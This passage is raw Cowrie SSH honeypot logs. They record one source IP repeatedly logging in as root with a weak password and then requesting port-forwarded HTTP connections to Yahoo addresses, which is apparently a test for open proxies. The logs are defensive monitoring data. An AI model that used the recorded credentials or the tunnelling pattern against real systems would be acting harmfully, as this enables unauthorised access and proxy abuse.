-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.088793Z","src_ip":"213.209.150.239","session":"0f327b2fdd66"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.323026Z","src_ip":"213.209.150.239","session":"0f327b2fdd66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3146,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3146","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.371307Z","session":"0f327b2fdd66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.418766Z","src_ip":"213.209.150.239","session":"0f327b2fdd66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":20895,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20895","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.557447Z","session":"0f327b2fdd66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.605031Z","src_ip":"213.209.150.239","session":"0f327b2fdd66"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.652864Z","src_ip":"213.209.150.239","session":"0f327b2fdd66"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17842,"dst_ip":"1.2.3.4","dst_port":22,"session":"66bc47dcc753","protocol":"ssh","message":"New connection: 213.209.150.239:17842 (1.2.3.4:22) [session: 66bc47dcc753]","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.708748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.718680Z","src_ip":"213.209.150.239","session":"66bc47dcc753"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.765781Z","src_ip":"213.209.150.239","session":"66bc47dcc753"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.048417Z","src_ip":"213.209.150.239","session":"66bc47dcc753"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":9873,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9873","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.106427Z","session":"66bc47dcc753"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.163360Z","src_ip":"213.209.150.239","session":"66bc47dcc753"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":25644,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25644","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.319200Z","session":"66bc47dcc753"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.375888Z","src_ip":"213.209.150.239","session":"66bc47dcc753"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.433704Z","src_ip":"213.209.150.239","session":"66bc47dcc753"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17902,"dst_ip":"1.2.3.4","dst_port":22,"session":"66f8d6b5f81c","protocol":"ssh","message":"New connection: 213.209.150.239:17902 (1.2.3.4:22) [session: 66f8d6b5f81c]","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.479647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.480442Z","src_ip":"213.209.150.239","session":"66f8d6b5f81c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.527605Z","src_ip":"213.209.150.239","session":"66f8d6b5f81c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.762185Z","src_ip":"213.209.150.239","session":"66f8d6b5f81c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12563,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12563","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.810382Z","session":"66f8d6b5f81c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.857430Z","src_ip":"213.209.150.239","session":"66f8d6b5f81c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14298,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14298","sensor":"my-vps","timestamp":"2025-08-26T01:01:20.993504Z","session":"66f8d6b5f81c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.040822Z","src_ip":"213.209.150.239","session":"66f8d6b5f81c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.088767Z","src_ip":"213.209.150.239","session":"66f8d6b5f81c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17952,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad3a05eef726","protocol":"ssh","message":"New connection: 213.209.150.239:17952 (1.2.3.4:22) [session: ad3a05eef726]","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.134978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.136267Z","src_ip":"213.209.150.239","session":"ad3a05eef726"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.183539Z","src_ip":"213.209.150.239","session":"ad3a05eef726"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.419030Z","src_ip":"213.209.150.239","session":"ad3a05eef726"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23834,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23834","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.467309Z","session":"ad3a05eef726"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.514689Z","src_ip":"213.209.150.239","session":"ad3a05eef726"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23385,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23385","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.649465Z","session":"ad3a05eef726"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.696661Z","src_ip":"213.209.150.239","session":"ad3a05eef726"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.745479Z","src_ip":"213.209.150.239","session":"ad3a05eef726"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17994,"dst_ip":"1.2.3.4","dst_port":22,"session":"3beb1e4723ca","protocol":"ssh","message":"New connection: 213.209.150.239:17994 (1.2.3.4:22) [session: 3beb1e4723ca]","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.791494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.792106Z","src_ip":"213.209.150.239","session":"3beb1e4723ca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:21.839827Z","src_ip":"213.209.150.239","session":"3beb1e4723ca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.075437Z","src_ip":"213.209.150.239","session":"3beb1e4723ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":6906,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6906","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.123717Z","session":"3beb1e4723ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.170876Z","src_ip":"213.209.150.239","session":"3beb1e4723ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":3785,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3785","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.309600Z","session":"3beb1e4723ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.356714Z","src_ip":"213.209.150.239","session":"3beb1e4723ca"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.404751Z","src_ip":"213.209.150.239","session":"3beb1e4723ca"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18047,"dst_ip":"1.2.3.4","dst_port":22,"session":"e16311e30d05","protocol":"ssh","message":"New connection: 213.209.150.239:18047 (1.2.3.4:22) [session: e16311e30d05]","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.450877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.451778Z","src_ip":"213.209.150.239","session":"e16311e30d05"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.498737Z","src_ip":"213.209.150.239","session":"e16311e30d05"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.733435Z","src_ip":"213.209.150.239","session":"e16311e30d05"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25065,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25065","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.782238Z","session":"e16311e30d05"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.829340Z","src_ip":"213.209.150.239","session":"e16311e30d05"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27179,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27179","sensor":"my-vps","timestamp":"2025-08-26T01:01:22.965433Z","session":"e16311e30d05"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.012822Z","src_ip":"213.209.150.239","session":"e16311e30d05"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:23.060918Z","src_ip":"213.209.150.239","session":"e16311e30d05"}
